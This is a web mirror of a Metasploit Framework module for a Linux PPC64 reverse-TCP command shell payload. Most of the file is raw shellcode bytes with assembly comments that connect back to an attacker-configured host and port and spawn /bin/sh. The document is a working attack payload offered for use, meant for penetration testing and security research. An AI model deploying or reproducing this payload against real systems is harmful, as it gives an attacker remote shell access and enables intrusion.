Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/linux/ppc64/shell_reverse_tcp.rb
19516 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
module MetasploitModule
7
CachedSize = 183
8
9
include Msf::Payload::Single
10
include Msf::Payload::Linux::Ppc::Prepends
11
include Msf::Sessions::CommandShellOptions
12
13
def initialize(info = {})
14
super(
15
merge_info(
16
info,
17
'Name' => 'Linux Command Shell, Reverse TCP Inline',
18
'Description' => 'Connect back to attacker and spawn a command shell',
19
'Author' => 'Ramon de C Valle',
20
'License' => MSF_LICENSE,
21
'Platform' => 'linux',
22
'Arch' => ARCH_PPC64,
23
'Handler' => Msf::Handler::ReverseTcp,
24
'Session' => Msf::Sessions::CommandShellUnix,
25
'Payload' => {
26
'Offsets' =>
27
{
28
'LHOST' => [ [ 54, 58 ], 'ADDR16MSB' ],
29
'LPORT' => [ 62, 'n' ]
30
},
31
'Payload' =>
32
"\x7f\xff\xfa\x78" + # xor r31,r31,r31 #
33
"\x3b\xa0\x01\xff" + # li r29,511 #
34
"\x3b\x9d\xfe\x02" + # addi r28,r29,-510 #
35
"\x3b\x7d\xfe\x03" + # addi r27,r29,-509 #
36
"\xfb\xe1\xff\xf9" + # stdu r31,-8(r1) #
37
"\xfb\x81\xff\xf9" + # stdu r28,-8(r1) #
38
"\xfb\x61\xff\xf9" + # stdu r27,-8(r1) #
39
"\x7c\x24\x0b\x78" + # mr r4,r1 #
40
"\x38\x7d\xfe\x02" + # addi r3,r29,-510 #
41
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
42
"\x44\x00\x00\x02" + # sc #
43
"\x7c\x7a\x1b\x78" + # mr r26,r3 #
44
"\x3b\x3d\xfe\x11" + # addi r25,r29,-495 #
45
"\x3e\xe0\x7f\x00" + # lis r23,32512 #
46
"\x62\xf7\x00\x01" + # ori r23,r23,1 #
47
"\x3a\xc0\x04\xd2" + # li r22,1234 #
48
"\x96\xe1\xff\xfc" + # stwu r23,-4(r1) #
49
"\x96\xc1\xff\xfc" + # stwu r22,-4(r1) #
50
"\x93\x61\xff\xfe" + # stw r27,-2(r1) #
51
"\x7c\x35\x0b\x78" + # mr r21,r1 #
52
"\xfb\x21\xff\xf9" + # stdu r25,-8(r1) #
53
"\xfa\xa1\xff\xf9" + # stdu r21,-8(r1) #
54
"\xfb\x41\xff\xf9" + # stdu r26,-8(r1) #
55
"\x7c\x24\x0b\x78" + # mr r4,r1 #
56
"\x38\x7d\xfe\x04" + # addi r3,r29,-508 #
57
"\x38\x1d\xfe\x67" + # addi r0,r29,-409 #
58
"\x44\x00\x00\x02" + # sc #
59
"\x7f\x64\xdb\x78" + # mr r4,r27 #
60
"\x7f\x43\xd3\x78" + # mr r3,r26 #
61
"\x38\x1d\xfe\x40" + # addi r0,r29,-448 #
62
"\x44\x00\x00\x02" + # sc #
63
"\x37\x7b\xff\xff" + # addic. r27,r27,-1 #
64
"\x40\x80\xff\xec" + # bge+ <cntsockcode64+108> #
65
"\x7c\xa5\x2a\x79" + # xor. r5,r5,r5 #
66
"\x40\x82\xff\xfd" + # bnel+ <cntsockcode64+132> #
67
"\x7f\xc8\x02\xa6" + # mflr r30 #
68
"\x3b\xde\x01\xff" + # addi r30,r30,511 #
69
"\x38\x7e\xfe\x25" + # addi r3,r30,-475 #
70
"\x98\xbe\xfe\x2c" + # stb r5,-468(r30) #
71
"\xf8\xa1\xff\xf9" + # stdu r5,-8(r1) #
72
"\xf8\x61\xff\xf9" + # stdu r3,-8(r1) #
73
"\x7c\x24\x0b\x78" + # mr r4,r1 #
74
"\x38\x1d\xfe\x0c" + # addi r0,r29,-500 #
75
"\x44\x00\x00\x02" + # sc #
76
'/bin/sh'
77
}
78
)
79
)
80
end
81
end
82
83